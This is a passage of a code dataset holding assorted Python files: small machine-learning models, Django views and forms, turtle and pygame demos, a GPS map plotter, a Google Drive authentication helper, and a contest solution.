tf\n\nclass Network:\n def __init__(self, n_hid1=30, n_hid2=30, learning_rate=0.01):\n self.n_in = 784\n self.n_hid1 = n_hid1\n self.n_hid2 = n_hid2\n self.n_out = 10\n\n self.x = tf.placeholder(tf.float32, [None, 
784])\n self.t = tf.placeholder(tf.float32, [None, 10])\n self.y = self._inference()\n\n self.loss = self._loss(self.y, self.t)\n self.train_step = self._training(self.loss, learning_rate=learning_rate)\n\n self.correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.t, 1))\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.saver = tf.train.Saver()\n self.sess = tf.Session()\n init = tf.global_variables_initializer()\n self.sess.run(init)\n\n def _inference(self):\n def _weight_variable(shape):\n # randomは値固定とする\n initial = tf.truncated_normal(shape, mean=0.0, stddev=1.0)\n return tf.Variable(initial)\n\n def _bias_variable(shape):\n initial = tf.zeros(shape, dtype=tf.float32)\n return tf.Variable(initial)\n\n # InputLayer -> Hidden-1-Layer\n W1 = _weight_variable(shape=[self.n_in, self.n_hid1])\n b1 = _bias_variable(shape=[self.n_hid1])\n f1 = tf.matmul(self.x, W1) + b1\n # f1_out = self._LeakyReLU(f1)\n f1_out = tf.nn.sigmoid(f1)\n\n # Hidden-1-Layer -> Hidden-2-Layer\n W2 = _weight_variable(shape=[self.n_hid1, self.n_hid2])\n b2 = _bias_variable(shape=[self.n_hid2])\n f2 = tf.matmul(f1_out, W2) + b2\n # f2_out = self._LeakyReLU(f2)\n f2_out = tf.nn.sigmoid(f2)\n\n # Hidden-2-Layer -> OutputLayer\n W3 = _weight_variable(shape=[self.n_hid2, self.n_out])\n b3 = _bias_variable(shape=[self.n_out])\n f3 = tf.matmul(f2_out, W3) + b3\n f3_out = tf.nn.softmax(f3)\n\n y = f3_out\n return y\n\n def _loss(self, y, t):\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(t * tf.log(y + 1.0**-8), reduction_indices=[1]))\n return cross_entropy\n\n def _training(self, loss, learning_rate, beta1=0.9, beta2=0.999):\n optimizer = \\\n tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1, beta2=beta2)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n train_step = optimizer.minimize(loss)\n return train_step\n\n def _LeakyReLU(self, f, a=0.2):\n return tf.maximum(f, f * a)\n\n\n\n","sub_path":"ga_nn/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"247217131","text":"# This code will receive how many notes the user wants\r\n# And find the average between all the notes\r\n\r\nx = int(input(\"Enter how many notes you have:\")) # Input how many notes do you want to enter\r\ntotal = 0 # total = the sum of all notes \r\n\r\nfor i in range(x): # For i less than input\r\n note = float(input(\"Enter the value:\")) # Enter the notes\r\n total += note # Add notes to total\r\nprint(total / x, \"= Average note.\") # Print the average\r\n","sub_path":"wiki.python.org.br/Repeat_Structure/19 Average_Notes.py","file_name":"19 Average_Notes.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"218775992","text":"import csv\nimport cv2\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras import Sequential\n\ndef datasetGen():\n with open('simdata/driving_log.csv') as log_file:\n log_reader = csv.DictReader(log_file)\n X = []\n y = []\n steering_offset = 0.4\n\n for row in log_reader:\n centerImage = mpimg.imread(row['center'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedCenterImage = np.fliplr(centerImage)\n 
centerSteering = float(row['steering'])\n\n leftImage = mpimg.imread(row['left'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedLeftImage = np.fliplr(leftImage)\n leftSteering = centerSteering + steering_offset\n\n rightImage = mpimg.imread(row['right'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedRightImage = np.fliplr(rightImage)\n rightSteering = centerSteering - steering_offset\n \n X.append(centerImage)\n X.append(flippedCenterImage)\n X.append(leftImage)\n X.append(flippedLeftImage)\n X.append(rightImage)\n X.append(flippedRightImage)\n \n y.append(centerSteering)\n y.append(-centerSteering)\n y.append(leftSteering)\n y.append(-leftSteering)\n y.append(rightSteering)\n y.append(-rightSteering)\n\n X = np.array(X)\n y = np.array(y)\n \n return X, y\n\ndef model():\n model = Sequential()\n\n model.add(layers.Conv2D(8, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n input_shape=(160, 320, 3), \n padding='same'))\n\n model.add(layers.Conv2D(16, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.AveragePooling2D(pool_size=(2, 2), \n strides=(1, 1), \n padding='valid'))\n\n model.add(layers.Conv2D(32, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Conv2D(32, \n kernel_size=(3, 3), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.AveragePooling2D(pool_size=(2, 2), \n strides=(1, 1), \n padding='valid'))\n\n model.add(layers.Conv2D(64, \n kernel_size=(3, 3), \n strides=(1, 1), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Conv2D(64, \n kernel_size=(3, 3), \n strides=(1, 1), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Dropout(0.5))\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(1024, activation='linear'))\n\n model.add(layers.Dense(512, activation='linear'))\n\n model.add(layers.Dense(64, activation='linear'))\n\n model.add(layers.Dense(8, activation='linear'))\n\n model.add(layers.Dense(1, activation='linear'))\n\n model.compile(loss='mse', optimizer='adam')\n\n return model\n\nX, y = datasetGen()\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, random_state=42) \n\nmodel = model()\nmodel.summary()\n\nmodel.fit(X_train, y_train, \n epochs=8, \n batch_size=512,\n validation_data=(X_valid, y_valid))\n\nmodel.save('model.h5')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"160802606","text":"from turtle import *\ndef carre(taille, couleur):\n \"fonction qui dessine un carré de taille et de couleur déterminées\"\n color(couleur)\n c =0\n while c <4:\n forward(taille)\n right(90)\n c = c + 1\n\nif __name__ == \"__main__\":\n \n up() # relever le crayon\n goto(-150, 50) # reculer en haut à gauche\n for i in range(10):# dessiner dix carrés rouges, alignés :\n down() # abaisser le crayon\n carre(25, 'red') # tracer un carré\n up() # relever le crayon\n forward(30) # avancer + loin\n down()\n\n","sub_path":"Pyhton/EXO/10carre.py","file_name":"10carre.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"101215579","text":"from crispy_forms.bootstrap import FormActions\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Row, Div, Field\nfrom 
django import forms\n\nfrom backend_apps.utils.forms import smtSave, btnCancel, btnReset\nfrom ..models.cliente import Cliente\nfrom ..models.departamento import Departamento\nfrom ..models.provincia import Provincia\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = Cliente\n exclude = ('created_at', 'updated_at', \"user\", \"es_juridico\")\n\n def clean_nro_documento(self):\n cleaned_data = super(ClienteForm, self).clean()\n tipo_documento = cleaned_data.get(\"tipo_documento\")\n nro_documento = cleaned_data.get(\"nro_documento\")\n try:\n int(nro_documento)\n except:\n raise forms.ValidationError(u\"No es número\")\n if tipo_documento.codigo == '1': # es dni\n if len(str(nro_documento)) != 8:\n raise forms.ValidationError('No son 8 Digitos para DNI')\n if tipo_documento.codigo == '6': # es RUnc\n if len(str(nro_documento)) != 11:\n raise forms.ValidationError('No son 11 Digitos para RUC')\n\n return nro_documento\n\n def __init__(self, *args, **kwargs):\n super(ClienteForm, self).__init__(*args, **kwargs)\n self.fields['departamento'] = forms.ModelChoiceField(\n label=\"Departamento\", required=False,\n queryset=Departamento.objects.all(),\n help_text=u' %s' %\n u' ',\n )\n self.fields['provincia'] = forms.ModelChoiceField(\n label=\"Provincia\", required=False,\n queryset=Provincia.objects.all(),\n help_text=u' %s' %\n u' ',\n )\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.attrs['autocomplete'] = \"off\"\n self.helper.form_class = 'js-validate form-vertical'\n self.helper.layout = Layout(\n Row(\n Div(Field('nombres', css_class='input-required'), css_class='col-md-3'),\n Div(Field('apellidos', ), css_class='col-md-3'),\n Div(Field('tipo_documento', css_class='input-required'), css_class='col-md-3'),\n Div(Field('nro_documento', css_class='input-required'), css_class='col-md-3'),\n ),\n Row(\n Div(Field('departamento', css_class='input-required'), css_class='col-md-2'),\n Div(Field('provincia', css_class='input-required'), css_class='col-md-2'),\n Div(Field('lugar', css_class='input-required'), css_class='col-md-2', ),\n\n Div(Field('direccion', css_class='input-required'), css_class='col-md-3'),\n Div(Field('nro_telefono', css_class='input-required'), css_class='col-md-3'),\n ),\n\n Row(\n FormActions(\n smtSave(\"Guardar\"),\n btnCancel(),\n ),\n ),\n )\n","sub_path":"apps/persona/forms/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"516744899","text":"from django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.generic import DetailView, ListView\nfrom django.db.models import Q, F\nfrom django.core.cache import cache\n\nfrom datetime import date\n\nfrom .models import Tag, Post, Category\nfrom config.models import SideBar\nfrom comment.models import Comment\nfrom comment.form import CommentForm\n# Create your views here.\n\nclass CommonViewMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(\n {'sidebars': SideBar.get_all()}\n )\n context.update(Category.get_navs())\n return context\n\nclass IndexView(CommonViewMixin, ListView):\n queryset = Post.latest_posts()\n paginate_by = 5\n context_object_name = 'post_list'\n template_name = 'blog/list.html'\n\nclass PostListView(CommonViewMixin, ListView):\n queryset = Post.latest_posts()\n paginate_by = 1\n context_object_name = 'post_list'\n template_name 
= 'blog/list.html'\n\nclass PostDetailView(CommonViewMixin, DetailView):\n model = Post\n template_name = 'blog/detail.html'\n context_object_name = 'post'\n pk_url_kwarg = 'post_id'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update({\n 'comment_form': CommentForm,\n 'comment_list':Comment.get_by_target(self.request.path)\n })\n return context\n\n def get(self, request, *args, **kwargs):\n response = super().get(request, *args, **kwargs)\n self.handle_visited()\n return response\n\n def handle_visited(self):\n increase_pv = False\n increase_uv = False\n uid = self.request.uid\n pv_key = 'pv:{}:{}'.format(uid,self.request.path)\n uv_key = 'uv:{}:{}:{}'.format(uid, str(date.today()),self.request.path)\n\n if not cache.get(pv_key):\n increase_pv = True\n cache.set(pv_key, 1, 1*60)#1分钟有效\n\n if not cache.get(uv_key):\n increase_uv = True\n cache.set(pv_key, 1, 24*60*60) #24小时有效期\n\n if increase_pv and increase_uv:\n Post.objects.filter(pk=self.object.id).update(pv=F('pv')+1, uv=F('uv')+1)\n elif increase_pv:\n Post.objects.filter(pk=self.object.id).update(pv=F('pv')+1)\n elif increase_uv:\n Post.objects.filter(pk=self.object.id).update(pv=F('uv') + 1)\n\nclass CategoryView(IndexView):\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n category_id = self.kwargs.get(\"category_id\")\n category = get_object_or_404(Category, pk=category_id)\n context.update({\n 'category':category\n })\n return context\n\n def get_queryset(self):\n \"\"\"\"重写queryset, 根据分类过滤\"\"\"\n queryset = super().get_queryset()\n tag_id = self.kwargs.get('category_id')\n return queryset.filter(category__id=tag_id)\n\nclass TagView(IndexView):\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n tag_id = self.kwargs.get(\"tag_id\")\n tag = get_object_or_404(Tag, pk=tag_id)\n context.update({\n 'tag': tag,\n })\n return context\n\n def get_queryset(self):\n \"\"\"\"重写queryset, 根据标签过滤\"\"\"\n queryset = super().get_queryset()\n tag_id = self.kwargs.get('tag_id')\n return queryset.filter(tag__id=tag_id)\n\nclass SearchView(IndexView):\n def get_context_data(self):\n context = super().get_context_data()\n context.update({\n 'keyword':self.request.GET.get('keyword')\n })\n return context\n\n def get_queryset(self):\n queryset = super().get_queryset()\n keyword = self.request.GET.get('keyword')\n if not keyword:\n return queryset\n return queryset.filter(Q(title__icontains=keyword)|Q(desc__icontains=keyword))\n\nclass AuthorView(IndexView):\n def get_queryset(self):\n queryset = super().get_queryset()\n author_id = self.kwargs.get('owner_id')\n return queryset.filter(owner_id = author_id)\n","sub_path":"typeidea/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"37140888","text":"\nimport os\nimport httplib2\n\nfrom apiclient import discovery\nfrom oauth2client import tools\nfrom oauth2client import client\nfrom oauth2client.file import Storage\n\nfrom auth import SCOPES, CLIENT_SECRET_FILE, APPLICATION_NAME\n\n\n_service = None\n\n\ndef get_service():\n global _service\n if _service:\n return _service\n http = _get_credentials().authorize(httplib2.Http(timeout=60))\n _service = discovery.build('drive', 'v3', http=http)\n return _service\n\n\ndef _get_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not 
os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, APPLICATION_NAME + '-app.json')\n store = Storage(credential_path)\n credentials = store.get()\n try:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\n except ImportError:\n flags = None\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n credentials = tools.run_flow(flow, store, flags)\n return credentials\n","sub_path":"app/auth/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"344970351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\nfrom color import *\n\nx = y = 0\nrunning = 1\n\nscreen = pygame.display.set_mode((600, 400))\ncont = 0\n\nwhile running:\n event = pygame.event.poll()\n if (event == pygame.QUIT):\n running = 0\n if (event == pygame.MOUSEMOTION):\n x, y = event.pos\n if (event == pygame.MOUSEBUTTONDOWN):\n if(cont<2):\n if(cont==0):\n p1 =list(event.pos)\n x1 = p1[0]\n y1 = p1[1]\n print(cont, x1, y1)\n if(cont==1):\n p2 =list(event.pos)\n x2 = p2[0]\n y2 = p2[1]\n print(cont, x2, y2)\n cont +=1\n \n screen.fill(color.negro)\n pygame.draw.line(screen, color.rojo, (x,0), (x,399))\n pygame.draw.line(screen, color.rojo, (0, y), (599,y))\n pygame.display.flip()\n \n \n","sub_path":"2020/M2/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"213070058","text":"import os\nimport folium\n\n\ndef convert(loc_data):\n loc_data = loc_data.replace(\"'\", \"\")\n loc_data = loc_data[1:-2].split(',')\n\n loc_data[1] = loc_data[1].strip()\n loc_data[3] = loc_data[3].strip()\n\n lat_int = int(loc_data[1][:2])\n lat_hour = float(loc_data[1][2:])\n\n real_lat = lat_int + lat_hour / 60\n\n long_int = int(loc_data[3][:3])\n long_hour = float(loc_data[3][3:])\n\n real_long = long_int + long_hour / 60\n\n print(real_lat, real_long)\n\n return real_lat, real_long\n\n\ncurrent_dir = os.getcwd()\nfilename = \"/Database/gps2.txt\"\nfile_dir = current_dir + filename\n\nwith open(file_dir,\"r\") as f:\n data = f.readlines()\n\nstart_lat, start_long = convert(data[0])\nmap = folium.Map(location=[start_lat, start_long], zoom_start=15)\n\ncnt = 0\n\nfor single_data in data:\n print(single_data)\n mark_lat, mark_long = convert(single_data)\n\n # 숫자 조정으로 마커 간격 조정 가능\n if cnt % 30 == 0:\n folium.Marker(\n location=[mark_lat, mark_long],\n icon=folium.Icon(color='red', icon='star')\n ).add_to(map)\n\n cnt+=1\n\nmap.save('map_visualize.html')\n","sub_path":"international_2019/ThinKingo/map_visualizer.py","file_name":"map_visualizer.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"79201233","text":"from django.urls import path,include\nfrom .views import RegisterView,StudentView\n\n\n\nurlpatterns = [\n path('register/',RegisterView.as_view(),name='regiser'),\n path('student/',StudentView.as_view(),name='student'),\n path('auth/',include('rest_framework.urls')),\n]\n","sub_path":"newreg/testapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} 
+{"seq_id":"56025864","text":"import random \nimport numpy as np\nimport cv2\nimport mss\nfrom PIL import Image\n\n##眼动轨迹数据文件\n##f=open(\"data.txt\",\"r\")\n\n##设置截图区域\nmon = {'top': 60, 'left': 60, 'width': 300, 'height': 300}\nsct =mss.mss()\nwhile 1:\n ##从文本文档中读取\n ##note=f.readline().split()\n ##实时读取\n note=[]\n a=random.randint(70,450)\n b=random.randint(70,450)\n note.append(a)\n note.append(b)\n ##对坐标进行映射\n ##.....\n\n ##截屏\n sct_img=sct.grab(mon)\n img = Image.frombytes('RGB', (sct_img.width, sct_img.height), sct_img.rgb)\n img=np.array(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n ##绘图\n cv2.circle(img,(int(note[0]),int(note[1])),10,(0,0,213))\n cv2.imshow('test', img)\n \n ##设置频率\n if cv2.waitKey(25) & 0xFF == ord('q'): \n cv2.destroyAllWindows()\n break\n\n\n\n\n##\n##图像流实现屏幕共享\n##频率一致实现轨迹标注 \n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"151368576","text":"\"\"\"\npure vector observation based learning: position of tactip and target\ntask: tactip following the cylinder to reach the ball target\nuse 382 pins\n\"\"\"\n\nimport tensorflow as tf\n# from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D, Flatten\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gym, threading, queue\nfrom gym_unity.envs import UnityEnv\nimport argparse\nfrom PIL import Image\nfrom deform_visualize import plot_list_new, plot_list_new_sim2\nimport pickle\n\n\nparser = argparse.ArgumentParser(description='Train or test neural net motor controller.')\nparser.add_argument('--train', dest='train', action='store_true', default=False)\nparser.add_argument('--test', dest='test', action='store_true', default=False)\nparser.add_argument('--rotat_test', dest='rotat_test', action='store_true', default=False)\n\nargs = parser.parse_args()\n\n\nclass Classifier(object):\n def __init__(self, obs_dim, label_dim, ini_lr, num_obj=3): \n self.hidden_dim=500 \n self.num_obj=num_obj \n self.sess = tf.Session()\n self.label = tf.placeholder(tf.float32, [None, label_dim], 'label') \n self.label_obj = tf.placeholder(tf.int8, [None, num_obj], 'label_obj') \n self.obs = tf.placeholder(tf.float32, [None, obs_dim], 'obs')\n self.lr = tf.placeholder_with_default(ini_lr, shape=(), name='lr')\n self.training = tf.placeholder_with_default(False, shape=(), name='training') # BN signal\n\n l1 = tf.layers.dense(self.obs, self.hidden_dim, tf.nn.relu)\n # l1 = tf.layers.batch_normalization(l1, training=self.training, momentum=0.9)\n l2 = tf.layers.dense(l1, self.hidden_dim, tf.nn.relu)\n # l2 = tf.layers.batch_normalization(l2, training=self.training, momentum=0.9)\n l3 = tf.layers.dense(l2, self.hidden_dim, tf.nn.relu)\n # l31 = tf.layers.dense(l3, self.hidden_dim, tf.nn.relu)\n self.predict = tf.layers.dense(l3, label_dim) # predict position and rotation\n # self.predict = tf.layers.batch_normalization(self.predict, training=training, momentum=0.9)\n # l21 = tf.layers.dense(l2, self.hidden_dim, tf.nn.relu)\n logits = tf.layers.dense(l2, self.num_obj, tf.nn.relu)\n # logits = tf.layers.batch_normalization(logits, training=self.training, momentum=0.9)\n self.predict_obj = tf.nn.softmax(logits) # predict index of object\n # self.loss1 = tf.reduce_mean(tf.square(self.predict[:, :3]-self.label[:, :3])) # rotation\n self.loss1 = tf.reduce_mean(tf.square(self.predict[:, 3:]-self.label[:, 3:])) # pos\n\n # 
self.loss2 = tf.reduce_mean(tf.square(self.predict_obj-tf.cast(self.label_obj, tf.float32)))\n # self.loss = self.loss1 + self.loss2\n self.loss = self.loss1\n # self.optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)\n self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.lr)\n self.train_op = self.optimizer.minimize(self.loss)\n self.sess.run(tf.global_variables_initializer())\n\n def train(self, batch_s, batch_label, batch_label_obj, lr, decay):\n # self.optimizer.learning_rate = lr\n # if decay:\n # self.train_op = self.optimizer.minimize(self.loss)\n loss,_=self.sess.run([self.loss, self.train_op], {self.training: True, self.obs: batch_s, self.label: batch_label, self.label_obj: batch_label_obj, self.lr: lr})\n # if decay: \n # print(self.optimizer._lr)\n return loss\n\n def predict_one_value(self, s):\n s = s[np.newaxis, :]\n predict = self.sess.run(self.predict, {self.obs: s})\n predict_obj =self.sess.run(self.predict_obj, {self.obs: s})\n return np.concatenate((predict_obj, predict), axis=1)\n \n def predict_value(self, s):\n predict = self.sess.run(self.predict, {self.obs: s})\n predict_obj =self.sess.run(self.predict_obj, {self.obs: s})\n return np.concatenate((predict_obj, predict), axis=1)\n\n def save(self, path):\n saver = tf.train.Saver()\n saver.save(self.sess, path)\n\n def load(self, path):\n saver=tf.train.Saver()\n saver.restore(self.sess, path)\n\n\ndef plot(s):\n x=s[7::3]\n z=s[9::3]\n plot_list_new(x,z)\n\ndef state_process(s):\n ps=np.concatenate((s[7::3],s[9::3])) # ((x,x,x..),(y,y,y,...))\n return ps\n\n\ndef to_one_hot(idx_list): # return one-hot vector list for object index predicting\n num_samples = len(idx_list)\n # print(idx_list.shape)\n # print(num_samples, self.num_obj)\n one_hot = np.zeros((num_samples, num_obj))\n one_hot[np.arange(num_samples), np.array(idx_list)] = 1\n\n return one_hot\n\n\ndef Predict(input, model_path = './model/class_obj'): \n obs_dim = 182 # total 280: 0 object index, 1-3 rotation value, 4-6 average contact point position, 7-279 pins positions\n state_dim = 5 # 3 rotation, 2 position\n lr=2e-2\n num_obj=3 # number of objects\n classifier = Classifier(obs_dim, state_dim, lr, num_obj)\n classifier.load(model_path) \n predict = classifier.predict_one_value(input)\n return predict\n\nif __name__ == '__main__':\n model_path = './model/class_obj'\n training_episodes = 80000\n episode_length = 150\n obs_dim = 182 # total 280: 0 object index, 1-3 rotation value, 4-6 average contact point position, 7-279 pins positions\n state_dim = 5 # 3 rotation, 2 position\n # lr=1e-3\n lr=2e-2\n decay=0 # decay signal of lr\n num_obj=3 # number of objects\n classifier = Classifier(obs_dim, state_dim, lr, num_obj)\n\n if args.train:\n # data_file=open('data_all/fixed_data.pickle', \"rb\")\n data_file=open('data_all/random2_data_train.pickle', \"rb\")\n\n raw_data=pickle.load(data_file)\n data=[]\n label=[]\n label_obj=[]\n \n for i in range(len(raw_data)):\n s=raw_data[i]\n data_i=state_process(s)\n ''' add noise '''\n data_i=data_i+np.random.normal(0, 1e-2, data_i.shape[0]) \n data.append(data_i)\n label_pos= np.concatenate(([s[4]], [s[6]]))\n label.append(np.concatenate((s[1:4]/30., label_pos))) # normalize the rotation range by 30, to get [-1,1]\n label_obj.append(int(s[0]))\n\n label_obj=to_one_hot(label_obj)\n loss_list=[]\n # classifier.load(model_path)\n\n for eps in range(training_episodes):\n if eps%40000==0 and eps>1:\n lr *=0.5\n decay=1\n else:\n decay=0\n loss = classifier.train(data, label, label_obj, lr, decay)\n if 
eps==0:\n loss_list.append(loss)\n else:\n loss_list.append(0.9*loss_list[-1]+0.1*loss)\n print('Eps: {}, Loss: {}'.format(eps, loss))\n if eps % 100 ==0:\n plt.yscale('log')\n plt.plot(np.arange(len(loss_list)), loss_list)\n plt.savefig('classify_trainwithdataobj.png')\n classifier.save(model_path)\n \n np.savetxt('trainwithdata.txt', np.array(loss_list)[:, np.newaxis], fmt='%.4f', newline=', ')\n round_loss_list=list(np.around(np.array(loss_list),4))\n print(round_loss_list)\n\n\n\n\n# test with testing dataset, all at once\n if args.test:\n # test_data_file=open('data_all/data_train.pickle', \"rb\")\n # test_data_file=open('data_all/fixed_data.pickle', \"rb\")\n test_data_file=open('data_all/random2_data_train.pickle', \"rb\")\n # test_data_file=open('data_all/random2_data_test.pickle', \"rb\")\n\n raw_data=pickle.load(test_data_file)\n data=[]\n label_list=[]\n classifier.load(model_path) \n for i in range(len(raw_data)):\n s=raw_data[i]\n # print('x:', s[7::3])\n # print('y: ', s[9::3])\n data.append(state_process(s))\n label_single= np.concatenate(([raw_data[i][4]], [raw_data[i][6]]))\n label=np.concatenate((raw_data[i][1:4]/30., label_single))\n label_list.append( np.concatenate((to_one_hot([int(raw_data[i][0])])[0], label)) )\n \n predict = classifier.predict_value(data)\n loss=np.mean(np.square(np.array(label_list)-np.array(predict)))\n loss_obj=np.mean(np.square(np.array(label_list)[:, :3]-np.array(predict)[:, :3]))\n loss_rotat=np.mean(np.square(np.array(label_list)[:, 3:6]-np.array(predict)[:, 3:6]))\n loss_pos=np.mean(np.square(np.array(label_list)[:, 6:]-np.array(predict)[:, 6:]))\n print('test loss: {:.4f} {:.4f} {:.4f} {:.4f}'.format(loss_obj, loss_rotat, loss_pos, loss))\n\n norm=0.5674\n for i in range(80):\n # data_i=data[i]+np.random.normal(0, 1e-2, data[i].shape[0])\n data_i=data[i]\n xy=np.transpose(data_i.reshape(2, -1))/norm\n pos_label=[raw_data[i][4]], [raw_data[i][6]]\n plot_list_new_sim2(xy,i,predict[i][6:]/norm, np.array(pos_label)/norm)\n print(i)\n\n if args.rotat_test:\n # test_data_file=open('data_all/data_train.pickle', \"rb\")\n # test_data_file=open('data_all/data_test.pickle', \"rb\")\n test_data_file=open('data_all/fixed_data.pickle', \"rb\")\n # test_data_file=open('data_all/random2_data_test.pickle', \"rb\")\n\n raw_data=pickle.load(test_data_file)\n data=[]\n label_list=[]\n classifier.load(model_path) \n for i in range(len(raw_data)):\n s=raw_data[i]\n data.append(state_process(s))\n label_single= np.concatenate(([raw_data[i][4]], [raw_data[i][6]]))\n label=np.concatenate((raw_data[i][1:4]/30., label_single))\n label_list.append( np.concatenate((to_one_hot([int(raw_data[i][0])])[0], label)) )\n \n predict = classifier.predict_value(data)\n loss=np.mean(np.square(np.array(label_list)-np.array(predict)))\n loss_obj=np.mean(np.square(np.array(label_list)[:, :3]-np.array(predict)[:, :3]))\n loss_rotat=np.mean(np.square(np.array(label_list)[:, 3:6]-np.array(predict)[:, 3:6]))\n loss_pos=np.mean(np.square(np.array(label_list)[:, 6:]-np.array(predict)[:, 6:]))\n print('test loss: {:.4f} {:.4f} {:.4f} {:.4f}'.format(loss_obj, loss_rotat, loss_pos, loss))\n\n norm2sim=30.\n for i in range(40):\n print(predict[i][3:6], label_list[i][3:6])\n # plot_list_new_sim(xy,i,predict[i][6:]/norm2sim)\n # print(i)","sub_path":"collision_prediction/train_with_data.py","file_name":"train_with_data.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"375680301","text":"from 
django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef upload_file(request):\n if request.method == 'GET':\n return render(request,'upload_file.html')\n elif request.method == 'POST':\n rec_file = request.FILES.get('icon')\n print(rec_file)\n # with 在读取完毕后,自动关闭\n with open(\"D:/python_code/django_study/static/img/test.docx\",'wb') as save_file:\n for part in rec_file.chunks():\n save_file.write(part)\n save_file.flush()\n return HttpResponse(\"文件上传成功\")","sub_path":"django_study/upload_file/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"34523209","text":"def main():\n r,b = map(int, input().split())\n x,y = map(int, input().split())\n ok = 0\n ng = 10 ** 18 + 1\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid,r,b,x,y):\n ok = mid\n else:\n ng = mid\n print(ok)\n\ndef is_ok(mid, r,b,x,y):\n r -= mid\n b -= mid\n if r < 0 or b < 0:\n return False\n total = r // (x - 1)\n total += b // (y - 1)\n if total >= mid:\n return True\n else:\n return False\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"procon-archive/atcoder.jp/arc050/arc050_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"237456844","text":"import os\nimport environ\nimport httplib2\nfrom xml.etree import ElementTree\n\nfrom src.base.street import Street\nfrom src.base.node import Node\n\n\nclass MapquestApi(object):\n # \"http://open.mapquestapi.com/xapi/api/0.6/node[highway=crossing][bbox=8.815191135900864,47.22491209728128,8.823774204748178,47.22819078179419]?key=...\"\n\n def __init__(self, street_categories):\n self.apiKey = self._get_api_key()\n self.crosswalks = []\n self.streets = []\n self.street_categories = 